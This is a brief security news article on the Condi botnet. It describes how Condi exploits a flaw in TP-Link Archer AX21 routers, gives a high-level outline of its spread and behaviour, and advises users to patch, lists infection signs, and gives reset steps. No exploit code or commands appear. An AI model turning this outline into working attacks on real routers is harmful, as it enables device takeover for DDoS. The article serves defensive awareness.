TP-Link AX21 Router vulnerability are exposed to being used as DDoS Botnet

Security researchers have recently discovered a new Distributed Denial of Service (DDoS) botnet named Condi that takes advantage of a critical vulnerability present in TP-Link Archer AX21 (AX1800) Wi-Fi routers.

Condi operates by renting out its network to carry out DDoS attacks on targeted victims while simultaneously selling the source code of the botnet and other tools to interested parties looking for quick financial gains.

TP-Link has released an update to address and fix the vulnerability. Users who own Archer AX21 routers are strongly advised to apply this update immediately to protect their devices.

The security flaw affecting TP-Link routers, as previously reported by the Zero Day Initiative (ZDI), has now been confirmed by independent researchers. The Archer AX21 routers are vulnerable to exploitation by malicious actors who can compromise the hardware and use it as part of their botnet infrastructure.

How is Condi botnet built?

1. The process of building the botnet starts with Condi scanning the internet for public IP addresses that have either port 80 or 8080 open. Once identified, the botnet sends a predefined exploitation request to download and execute a remote shell script on the targeted devices. Some instances of the botnet's spread have also been observed through an available ADB port (TCP/5555).
2. After infecting a device, the malware deployed by Condi attempts to terminate any competing processes running on the compromised device and disables older versions of itself. However, due to the absence of a persistence mechanism that allows the malware to survive device reboots, the Condi malware terminates the restarting or shutdown functions of the affected device.
3. To identify a potential infection by Condi, users should be vigilant for signs such as device overheating, network disruptions, unexplained modifications to network settings, and unexpected admin user password resets. If any suspicious activity is detected, it is crucial to perform a device reset and immediately apply the available update to safeguard against the threat.